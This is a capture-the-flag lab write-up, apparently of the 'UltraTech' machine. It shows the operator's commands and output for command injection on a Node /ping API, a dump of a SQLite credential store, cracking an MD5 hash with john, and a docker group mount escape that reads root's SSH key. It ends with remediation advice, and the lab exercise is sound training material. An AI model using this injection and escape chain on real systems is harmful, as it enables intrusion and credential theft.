Node ping injection, SQLite credential dump, and Docker group escape
Intermediate Linux engagement: UltraTech’s Node /ping API accepted shell metacharacters; SQLite hashes cracked to SSH as r00t; docker group membership mounted the host for root.
- Case files
- Node ping injection, SQLite credential dump, and Docker group escape
Apache on 31331 and a Node API on 8081. Command injection on /ping dumped utech.db.sqlite; cracked r00t:n100906; docker run -v /:/mnt escaped to host root.
Shell metacharacters on /ping listed and dumped the SQLite credential store.
r00t:n100906 over SSH; docker group mount returned host root and id_rsa.
Engagement summary
Apache on 31331 and a Node API on 8081. Command injection on /ping dumped utech.db.sqlite; cracked r00t:n100906; docker run -v /:/mnt escaped to host root.
ULTRATECH exposed SSH, a marketing site on 31331 (partners.html → js/api.js), and UltraTech API v0.1.3 on 8081. The /ping?ip= endpoint concatenated operator input into a shell. Quote/backtick injection listed utech.db.sqlite and dumped MD5 hashes for r00t and admin. Offline crack recovered n100906 for r00t. SSH landed inside a container where r00t was in the docker group. docker run -v /:/mnt --rm -it bash chroot /mnt sh mounted the host and exposed /root/.ssh/id_rsa.
Business impact
OS command injection on an internet-facing API is remote code execution. MD5 password storage and docker group membership without rootless constraints are host compromise. Parameterize ping targets, hash with a modern KDF, and treat docker group as equivalent to root.
REST /ping command injection
Shell metacharacters on /ping listed and dumped the SQLite credential store.
OPERATOR · API
savvy@lab:~$ nmap -sV -p- 10.10.213.191
22/tcp open ssh
8081/tcp open http Node.js Express
31331/tcp open http Apache
savvy@lab:~$ curl -s "http://10.10.213.191:8081/ping?ip=127.0.0.1'|`ls -la`"
utech.db.sqlite
savvy@lab:~$ curl -s "http://10.10.213.191:8081/ping?ip=127.0.0.1'|`cat utech.db.sqlite`"
r00t f357a0c52799563c7c7b76c1e7543a32
Hash crack, SSH, and Docker escape
r00t:n100906 over SSH; docker group mount returned host root and id_rsa.
OPERATOR · ROOT
savvy@lab:~$ echo 'f357a0c52799563c7c7b76c1e7543a32' > hash.txt && john hash.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt
n100906 (r00t)
savvy@lab:~$ ssh r00t@10.10.213.191
savvy@lab:~$ id
uid=1001(r00t) groups=1001(r00t),116(docker)
savvy@lab:~$ docker run -v /:/mnt --rm -it bash chroot /mnt /bin/sh
root@lab:~# head -c 9 /root/.ssh/id_rsa
MIIEogIBA
Remediation
Remove shell wrappers from /ping; validate IPs with a library. Upgrade password hashing; drop users from docker unless rootless and audited.